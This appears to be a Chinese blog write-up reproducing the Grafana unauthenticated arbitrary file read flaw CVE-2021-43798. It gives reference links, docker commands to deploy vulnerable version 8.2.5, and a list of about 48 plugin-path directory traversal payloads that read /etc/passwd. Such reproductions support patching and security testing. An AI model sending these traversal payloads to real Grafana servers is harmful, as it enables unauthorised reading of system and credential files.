Grafana 任意文件读取漏洞(CVE-2021-43798)
Preface
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
CVE编号:
CVE-2021-43798
影响范围:
Grafana v8.2.6
Links
https://nvd.nist.gov/vuln/detail/CVE-2021-43798
https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
复现记录
grafana 环境部署
docker pull grafana/grafana:8.2.5 docker run -d -p 3000:3000 --name=grafana grafana/grafana:8.2.5
PoCs
因为不知道Grafana安装了什么插件需要模糊测试:
/public/plugins/alertGroups/../../../../../../../../etc/passwd /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/alertmanager/../../../../../../../../etc/passwd /public/plugins/annolist/../../../../../../../../etc/passwd /public/plugins/barchart/../../../../../../../../etc/passwd /public/plugins/bargauge/../../../../../../../../etc/passwd /public/plugins/canvas/../../../../../../../../etc/passwd /public/plugins/cloudwatch/../../../../../../../../etc/passwd /public/plugins/dashboard/../../../../../../../../etc/passwd /public/plugins/dashlist/../../../../../../../../etc/passwd /public/plugins/debug/../../../../../../../../etc/passwd /public/plugins/elasticsearch/../../../../../../../../etc/passwd /public/plugins/gauge/../../../../../../../../etc/passwd /public/plugins/geomap/../../../../../../../../etc/passwd /public/plugins/gettingstarted/../../../../../../../../etc/passwd /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd /public/plugins/grafana/../../../../../../../../etc/passwd /public/plugins/graph/../../../../../../../../etc/passwd /public/plugins/graphite/../../../../../../../../etc/passwd /public/plugins/heatmap/../../../../../../../../etc/passwd /public/plugins/histogram/../../../../../../../../etc/passwd /public/plugins/influxdb/../../../../../../../../etc/passwd /public/plugins/jaeger/../../../../../../../../etc/passwd /public/plugins/live/../../../../../../../../etc/passwd /public/plugins/logs/../../../../../../../../etc/passwd /public/plugins/loki/../../../../../../../../etc/passwd /public/plugins/mixed/../../../../../../../../etc/passwd /public/plugins/mssql/../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../etc/passwd /public/plugins/news/../../../../../../../../etc/passwd /public/plugins/nodeGraph/../../../../../../../../etc/passwd /public/plugins/opentsdb/../../../../../../../../etc/passwd /public/plugins/piechart/../../../../../../../../etc/passwd /public/plugins/pluginlist/../../../../../../../../etc/passwd /public/plugins/postgres/../../../../../../../../etc/passwd /public/plugins/prometheus/../../../../../../../../etc/passwd /public/plugins/stat/../../../../../../../../etc/passwd /public/plugins/state-timeline/../../../../../../../../etc/passwd /public/plugins/status-history/../../../../../../../../etc/passwd /public/plugins/table-old/../../../../../../../../etc/passwd /public/plugins/table/../../../../../../../../etc/passwd /public/plugins/tempo/../../../../../../../../etc/passwd /public/plugins/testdata/../../../../../../../../etc/passwd /public/plugins/text/../../../../../../../../etc/passwd /public/plugins/timeseries/../../../../../../../../etc/passwd /public/plugins/welcome/../../../../../../../../etc/passwd /public/plugins/xychart/../../../../../../../../etc/passwd /public/plugins/zipkin/../../../../../../../../etc/passwd
-------------------------------------------
个性签名:如果世上的事都按你说的道理走 世界就不是现在这样了!
如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!
